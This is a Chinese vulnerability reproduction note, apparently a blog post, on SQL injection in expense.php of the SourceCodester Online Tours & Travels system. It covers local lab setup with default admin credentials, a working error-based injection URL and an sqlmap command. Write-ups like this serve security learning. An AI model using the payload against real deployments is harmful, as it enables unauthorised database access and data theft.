免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!

漏洞名称

SourceCodester在线旅游管理系统expense.php exec sql注入漏洞

漏洞影响

SourceCodester在线旅游管理系统,源码下载地址如下

https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

漏洞描述

SourceCodester是使用PHP和MySQL的在线旅游和旅行管理系统项目。具有完整的源代码,可用于学术项目目的。在该系统/admin/operations/expense.php接口处存在SQL注入漏洞。

想挖洞的同学可以看下其他几个项目

https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html


靶场搭建

靶场使用小皮面板工具搭建,没有的自行安装

https://www.xp.cn/

靶场源码下载

https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL

下载后解压


对源码再次解压

将tour文件夹复制到小皮网站的物理路径下


找到config.php文件,修改MySQL的用户名密码


在MySQL中创建数据库

create database tour1;

在解压目录下找到tour1.sql,并在数据库中执行语句,完成数据库初始化

然后重启nginx

访问网站http://localhost/tour/

靶场搭建成功

用户名密码:

Username : mayuri.infospace@gmail.com

Password : admin

漏洞复现

漏洞url

/admin/operations/expense.php

这是个get请求,可以直接在浏览器访问

http://localhost/tour/admin/operations/expense.php?id=1%27%20AND%20EXTRACTVALUE(1586,CONCAT(0x5c,0x7176626271,(SELECT%20(ELT(1586=1586,1))),0x7162717871))%20AND%20%27Vqhf%27=%27Vqhf

使用sqlmap查看数据库

sqlmap.py -u http://localhost/tour/admin/operations/expense.php?id=1 --current-db

修复建议

自行修改源码修复。